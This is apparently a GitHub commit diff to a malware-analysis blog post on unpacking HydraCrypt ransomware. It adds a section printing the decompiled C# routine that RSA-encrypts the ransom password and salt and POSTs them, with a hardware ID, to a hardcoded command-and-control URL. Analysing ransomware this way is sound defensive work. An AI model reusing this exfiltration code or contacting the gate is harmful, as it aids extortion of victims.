up

petikvx · Jan 8, 2024 · 79c787d · 79c787d
1 parent a3e0e1e
commit 79c787d
Showing 1 changed file with 47 additions and 5 deletions.
diff --git a/_posts/Malware Analyze/2024-01-15-unpacking-hydracrypt.md b/_posts/Malware Analyze/2024-01-15-unpacking-hydracrypt.md
@@ -160,7 +160,6 @@ private static void Run()
 }
 
 ```
-
 ### Password creation
 
 The malware will generate a 50-character password.
@@ -177,8 +176,7 @@ private static string CreatePassword(int length)
     return stringBuilder.ToString();
 }
 ```
-
-### ID Creation
+### HWID Creation
 
 The HWID() method generates a Hardware Identifier (HWID) using certain system information such as the current thread's ID, the username, the machine's name, the operating system version, and the system page size. This method returns the HWID as a string.
 
@@ -220,7 +218,51 @@ internal class Hwid
     }
 }
 ```
-
 The result will be displayed in the ransomware note.
 
-![your-id](/images/hydracrypt/your-id.png)
+![your-id](/images/hydracrypt/your-id.png)
+
+### Password sending
+
+This part of code defines a method called `SendPassword` that takes three parameters: `password`, `hwid`, and `salt`. The function performs the following operations:
+
+1.  It attempts to perform encryption using the RSACryptoServiceProvider library for both the `password` and `salt` parameters. These data are converted to Base64 strings after encryption.
+
+2.  It sets an URL (`address`) to which it will send data. The URL is specifically defined as "[http://a0902054.xsph.ru/one.php](http://a0902054.xsph.ru/one.php)".
+
+3.  It uses the WebClient class to send data to the server at the specified URL using a POST request. The data includes the previously encrypted and Base64-encoded `password`, `hwid`, and `salt`.
+
+```csharp
+public static void SendPassword(string password, string hwid, string salt)
+{
+    try
+    {
+        string value;
+        string value2;
+        using (RSACryptoServiceProvider rsacryptoServiceProvider = new RSACryptoServiceProvider())
+        {
+            rsacryptoServiceProvider.FromXmlString(Program.publickey);
+            value = Convert.ToBase64String(rsacryptoServiceProvider.Encrypt(Encoding.UTF8.GetBytes(password), false));
+            value2 = Convert.ToBase64String(rsacryptoServiceProvider.Encrypt(Encoding.UTF8.GetBytes(salt), false));
+        }
+        string address = Program.gate1;
+        using (WebClient webClient = new WebClient())
+        {
+            NameValueCollection data = new NameValueCollection
+            {
+                {"Password", value},
+                {"Hwid", hwid},
+                {"Salt", value2}
+            };
+            byte[] bytes = webClient.UploadValues(address, "POST", data);
+            Encoding.UTF8.GetString(bytes);
+        }
+    }
+    catch
+    {
+    }
+}
+
+public static string gate1 = "http://a0902054.xsph.ru/one.php";
+
+```